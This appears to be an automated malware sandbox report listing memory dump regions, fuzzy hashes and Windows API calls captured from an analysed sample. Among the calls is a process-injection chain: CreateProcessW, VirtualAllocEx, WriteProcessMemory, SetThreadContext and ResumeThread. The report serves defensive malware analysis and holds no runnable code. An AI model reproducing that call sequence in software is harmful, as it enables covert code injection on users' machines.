                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CurrentWow64
                                          • String ID: u@
                                          • API String ID: 1905925150-3232061631
                                          • Opcode ID: 05b8a05900606b398f09c2950b134f384ae98fa98ef01e98a6f019ff040a7163
                                          • Instruction ID: b4949ba5ee1ac7fd9ca4b4149c3ba77f2c621f6c2d7f9141efebdf600ba6dbaf
                                          • Opcode Fuzzy Hash: 05b8a05900606b398f09c2950b134f384ae98fa98ef01e98a6f019ff040a7163
                                          • Instruction Fuzzy Hash: 9BD05EB1400204EBDF1097A0A90DBCB37ACA748741F004871A105E60D2D6B8A688D728
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: YbXD$\/Q
                                          • API String ID: 0-3717613235
                                          • Opcode ID: 9348b78f1c2e840bbc8a40585f7cf2be86256909a9aac34c249016f860e58bca
                                          • Instruction ID: f2e3d9d870f0c07041e17f2dd64da53ae14b07d17eddcf163c3e61aa866a859e
                                          • Opcode Fuzzy Hash: 9348b78f1c2e840bbc8a40585f7cf2be86256909a9aac34c249016f860e58bca
                                          • Instruction Fuzzy Hash: F8B169B4E152198FCB08CFE9C9816DEFBF6BF99300F14C56AD404AB298D7349942CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c8c8afe4d2116cae180c156ec7e7c7eac229351a76586a67d75b0e3d79b84818
                                          • Instruction ID: 7bd8e0e9d4d2626b4c44d74622b087e43df3931fecc7c1fbd00e0e627ef57214
                                          • Opcode Fuzzy Hash: c8c8afe4d2116cae180c156ec7e7c7eac229351a76586a67d75b0e3d79b84818
                                          • Instruction Fuzzy Hash: 31434FB4A00219CFDB24DF68C894A9DB7B2BF59304F2581D9D419AB3A1DB30ED91CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: da22c93c4bcb1f3015540b6fc0310c4b2fefe233119c2287de50f2ab555ce338
                                          • Instruction ID: de045f634767ab4b66f960c6a9c7210e00772243dc85f6ff65a14e532d41404a
                                          • Opcode Fuzzy Hash: da22c93c4bcb1f3015540b6fc0310c4b2fefe233119c2287de50f2ab555ce338
                                          • Instruction Fuzzy Hash: 08C1A0B1E042599FDB05DFA5D850AEEBBB2FF89300F15C16AE404EB392DB349845CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6138c97366737f38d9859b7cc11850901986c7ba92af8a544d462e5c20f177b1
                                          • Instruction ID: d6bd4df60a82e0363e290dcc565dd02889b453fc45bd47fa1b936eb6c9cddf6b
                                          • Opcode Fuzzy Hash: 6138c97366737f38d9859b7cc11850901986c7ba92af8a544d462e5c20f177b1
                                          • Instruction Fuzzy Hash: DB428FB5B00215CFCB19DFA8C495AAD7BB2BF99714F168069E906DB3A0DB30EC41CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ed2e0a3dffff30a6d4629227873f46b9a321a0b75baf7ee071e2048774553179
                                          • Instruction ID: 57a83def5b1c170486af73326ed0580f77e6610823b78b564899ac977b3e0e13
                                          • Opcode Fuzzy Hash: ed2e0a3dffff30a6d4629227873f46b9a321a0b75baf7ee071e2048774553179
                                          • Instruction Fuzzy Hash: E09103B4E116198FCB08CFE9C880AEEFBB2BF89300F14942AD415AB3A4D7749945CF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9bc8d100da968c2523587291fb6b5024aad88d9f13b0bfe841b5db4ede8dff67
                                          • Instruction ID: f9dff50f00844522e511841449bf480d0cda0a885f3a0c2ca4b5a44403f9caea
                                          • Opcode Fuzzy Hash: 9bc8d100da968c2523587291fb6b5024aad88d9f13b0bfe841b5db4ede8dff67
                                          • Instruction Fuzzy Hash: 999117B4E116098FCB08CFE9C990ADEFBB2BF89300F14942AD415AB3A4D7749945CF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 56b8632e7846d21f8ce022767ea1ab79159fd3be53e40ba67ad3a1306711e825
                                          • Instruction ID: e5cfc42c904421f84fe5fbe2cac7e9d93fcaf91210af9a4dd703076d4a38844e
                                          • Opcode Fuzzy Hash: 56b8632e7846d21f8ce022767ea1ab79159fd3be53e40ba67ad3a1306711e825
                                          • Instruction Fuzzy Hash: EF81E1B4E112198FDB08CFE9C984AEEFBB2BF89300F10802AD519AB394D7749945CF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0cbbb525ea003e1a039af6cb8373c939dcf3201b434e38efe84107d413195726
                                          • Instruction ID: 60a3a350f17d28974525bcf3745f82887141e3c3c3b3940641108a8dfa90165d
                                          • Opcode Fuzzy Hash: 0cbbb525ea003e1a039af6cb8373c939dcf3201b434e38efe84107d413195726
                                          • Instruction Fuzzy Hash: C981E2B4E11619CFCB08CFE9C9846AEBBB2BF89300F20D42AD415AB394D7749945CF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ff16812e3050aa8faefe6579f85176fd3df633a1bf17ac6d8df68eaa281ea251
                                          • Instruction ID: 923da0642d78fb27dbef55bec1915b82c9845339e7aa6fd7569b45b2069e54a7
                                          • Opcode Fuzzy Hash: ff16812e3050aa8faefe6579f85176fd3df633a1bf17ac6d8df68eaa281ea251
                                          • Instruction Fuzzy Hash: 67512CB4E1520A8FCB08CFE6C9405EEFBF2EB89310F14C46AD419A7294D7748A418F98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 014DB8D0
                                          • GetCurrentThread.KERNEL32 ref: 014DB90D
                                          • GetCurrentProcess.KERNEL32 ref: 014DB94A
                                          • GetCurrentThreadId.KERNEL32 ref: 014DB9A3
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.387810199.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentProcess.KERNEL32 ref: 014DB8D0
                                          • GetCurrentThread.KERNEL32 ref: 014DB90D
                                          • GetCurrentProcess.KERNEL32 ref: 014DB94A
                                          • GetCurrentThreadId.KERNEL32 ref: 014DB9A3
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.387810199.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                          Similarity
                                          • API ID: Current$ProcessThread
                                          • String ID:
                                          • API String ID: 2063062207-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 014D97CE
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.387810199.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 04FD35F3
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 04FD35F3
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 014D5661
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.387810199.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 014D5661
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.387810199.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014D9849,00000800,00000000,00000000), ref: 014D9A5A
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.387810199.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04FD3BED
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04FD3BED
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014DBF27
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.387810199.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014DBF27
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.387810199.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 04FD3887
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: ContextThread
                                          • String ID:
                                          • API String ID: 1591575202-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04FD394F
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04FD394F
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 04FD3887
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: ContextThread
                                          • String ID:
                                          • API String ID: 1591575202-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014D9849,00000800,00000000,00000000), ref: 014D9A5A
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.387810199.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014D9849,00000800,00000000,00000000), ref: 014D9A5A
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.387810199.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04FD3A0B
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04FD3A0B
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 014D97CE
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.387810199.00000000014D0000.00000040.00000001.sdmp, Offset: 014D0000, based on PE: false
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,?,?,?), ref: 04FD4675
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostMessageW.USER32(?,?,?,?), ref: 04FD4675
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: MessagePost
                                          • String ID:
                                          • API String ID: 410705778-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.397992655.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                          Similarity
                                          • API ID: ResumeThread
                                          • String ID:
                                          • API String ID: 947044025-0

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: DIs7
                                          • API String ID: 0-4141230339

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: d?
                                          • API String ID: 0-3663673177

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: '{e
                                          • API String ID: 0-1570940953

                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 70c3050cc348d3850b7b585c22ae3b834e76e8d784a2e370f82bca9530524149
                                          • Instruction ID: f1b215baa65c9b887d18c2488ea5d8f284bf02b0b41b7faf483a31d1b76a648b
                                          • Opcode Fuzzy Hash: 70c3050cc348d3850b7b585c22ae3b834e76e8d784a2e370f82bca9530524149
                                          • Instruction Fuzzy Hash: D1F01F74916228CFCB65CF68C880AD9BBB1FB09314F511199E849A7350DB31AA82CF00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 92333295cdcb861758bc9b24444eef2025a63d47bcf4bbb26491c77d061307c2
                                          • Instruction ID: 1bfa970b6f9e9fac701414ea771ba823df883d45e013838ccc79537ecf62d8aa
                                          • Opcode Fuzzy Hash: 92333295cdcb861758bc9b24444eef2025a63d47bcf4bbb26491c77d061307c2
                                          • Instruction Fuzzy Hash: C5E075B4D0121DAFCB44EFE8E9456ADBBB4BB48600F5046AAD819A3340D7745A45DB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bcd869c9a669196d893e7517ca7e351328a186b6d5ab980f487f67e5c0e9b25c
                                          • Instruction ID: b8c9c1631ac6436096bc9ab83b44147bcfbb9710617788fe3d2476471e1d3a3e
                                          • Opcode Fuzzy Hash: bcd869c9a669196d893e7517ca7e351328a186b6d5ab980f487f67e5c0e9b25c
                                          • Instruction Fuzzy Hash: B1E06D74A11114CFC710CF98C58598DB7B2FF44300F12C594D809AB258D734EE80CE50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fa836d7f8741d0ac9d012ab1b308f60303cc9613f2004086ba97f0455d5954a3
                                          • Instruction ID: 3b294f4fa757d2451d2813d02f16346b70bc15acfb133baa2e61bbdfeb2c410e
                                          • Opcode Fuzzy Hash: fa836d7f8741d0ac9d012ab1b308f60303cc9613f2004086ba97f0455d5954a3
                                          • Instruction Fuzzy Hash: CCE0757091526DCFDBA4EFA9D984A8CB7B1AF48204F01849AD119B6264DB306D85CF20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000016.00000002.400430096.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8a7618536fe2391ceab950b348b84d7db60538ef2b256fc122b257af0c704fb4
                                          • Instruction ID: def69b70efaa56cb8a1c5424a341087f289f7f91da6f8bc0b01eb652f039f542
                                          • Opcode Fuzzy Hash: 8a7618536fe2391ceab950b348b84d7db60538ef2b256fc122b257af0c704fb4
                                          • Instruction Fuzzy Hash: F4D0927091621ACBDB54EFA5DD81A8DB6B1FB88204F109EA9D108A7168E7305A059FA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Executed Functions

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: YbXD$\/Q
                                          • API String ID: 0-3717613235
                                          • Opcode ID: a9f263e1d57d2a4667c20bd001e5e2af203cf2e97c7b6d3b2d9f40ef856c9a74
                                          • Instruction ID: 26facf57db2c990bb231d61cedea8f770602423829dc482335abfb328f263e8e
                                          • Opcode Fuzzy Hash: a9f263e1d57d2a4667c20bd001e5e2af203cf2e97c7b6d3b2d9f40ef856c9a74
                                          • Instruction Fuzzy Hash: CCB16574E052198FDF44DFE9D940ADEFBF2BF88310F24956AD408AB254E7349902CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b1ecb9c97548d38d66973d7ed209caafe5fa027b1d6c4fa83b81abaa161e70ea
                                          • Instruction ID: 20d6cacf5ad72662b220256b7b599d56057e76e35571a648984b7682f0389c71
                                          • Opcode Fuzzy Hash: b1ecb9c97548d38d66973d7ed209caafe5fa027b1d6c4fa83b81abaa161e70ea
                                          • Instruction Fuzzy Hash: 0A430A74E00219CFCB64EF68D888A9DB7B2BF49304F118599E519AB3A1DB31ED81CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 841812672ae7f626137f273b1703bde14b257835e58edbc5e21cb7065a639b44
                                          • Instruction ID: 4c7b4bcad73e33da184dab0b6a7ccf94dccbfab2553bc4384c0e85f6743a9941
                                          • Opcode Fuzzy Hash: 841812672ae7f626137f273b1703bde14b257835e58edbc5e21cb7065a639b44
                                          • Instruction Fuzzy Hash: 49527135A102158FCB54EF75D888AADB7B6BF88314F159068FA06DB3A0DB31ED41CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 14d02e4c8268d95234fe550a3c29aa8e8b26b948d9b54e96294954d5fcabfe26
                                          • Instruction ID: 7c4a922f123734798f5be09d2465e4de5e35d110babf5c6560c015b9cdb3a5b7
                                          • Opcode Fuzzy Hash: 14d02e4c8268d95234fe550a3c29aa8e8b26b948d9b54e96294954d5fcabfe26
                                          • Instruction Fuzzy Hash: 1081E674E017188FDB48CFEAC984AEEBBB2AF89300F10902AD515BB364D7349946CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5b6e2c90a32c9e157990c0ca8c55b16d7be97419cef58ce1b789b1e511fbc395
                                          • Instruction ID: bd483a29b67d41af0973d61f99a46788a3b0c4e643dde1ae33938430bb3f1fe9
                                          • Opcode Fuzzy Hash: 5b6e2c90a32c9e157990c0ca8c55b16d7be97419cef58ce1b789b1e511fbc395
                                          • Instruction Fuzzy Hash: 6181E474E012188FDB48CFEAD984AEEBBB2BF88300F10902AD515BB354D7349946CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bcb1fb6179f6007adad6ec5481c5474f9de65c721c4b5d3f4603c0a68f57c30d
                                          • Instruction ID: 13e5fd4544c7b2f0da80b8a7af89dfc83bcb671c7e6f1cb19c9e9e12196c5a61
                                          • Opcode Fuzzy Hash: bcb1fb6179f6007adad6ec5481c5474f9de65c721c4b5d3f4603c0a68f57c30d
                                          • Instruction Fuzzy Hash: 5571F374E012188FDB48CFEAD984AEEBBB2BF88300F20902AD515BB354D7359946CF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a79f2f48168a04787cb2c5842d77aafd8d63e425eaff08b602fb85d653d1aa80
                                          • Instruction ID: dcf69d12fa352cadf23a2762dab0ebf9439dfcd9b5c8120e76f8f522e803bbba
                                          • Opcode Fuzzy Hash: a79f2f48168a04787cb2c5842d77aafd8d63e425eaff08b602fb85d653d1aa80
                                          • Instruction Fuzzy Hash: DF51D474E012199FDB44DFAAD480AEEFBB2BF88304F24D569D414A7355DB349982CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 60e72515b371692aa4e9476245daef1e0d51bdfba5caadd1af2b196c01b43fd3
                                          • Instruction ID: ec27b26b66b142eee256d7cc49ab72ac46502553e36b2f2cd33dc5c9d8820b32
                                          • Opcode Fuzzy Hash: 60e72515b371692aa4e9476245daef1e0d51bdfba5caadd1af2b196c01b43fd3
                                          • Instruction Fuzzy Hash: 235158B0E143198FDB48DFA6D5405EEFBF2EB8D300F24D46AD419AB254D7348A418F94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 77387df955aba757c80790c5f5133b715a4ec9c0916a96d8f3712a19276a76b0
                                          • Instruction ID: 5db3e89e9478980c857ffaace9d904134f6b8758a86b5c4d7fc488deffc0f95d
                                          • Opcode Fuzzy Hash: 77387df955aba757c80790c5f5133b715a4ec9c0916a96d8f3712a19276a76b0
                                          • Instruction Fuzzy Hash: EC41F575E016088FDB44DFAAD841BEEBBF2EF88300F24C465D418AB354EB349946CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000017.00000002.415965676.0000000006E40000.00000040.00000001.sdmp, Offset: 06E40000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e95a9909324a690cffba7ea3356f4c5d31161eb8e7101b9bd17f24fbff88e5cb
                                          • Instruction ID: 500e2da109052442d913fe766c9510c7ee756ab92c2e7a47881ac7cbcfe54036
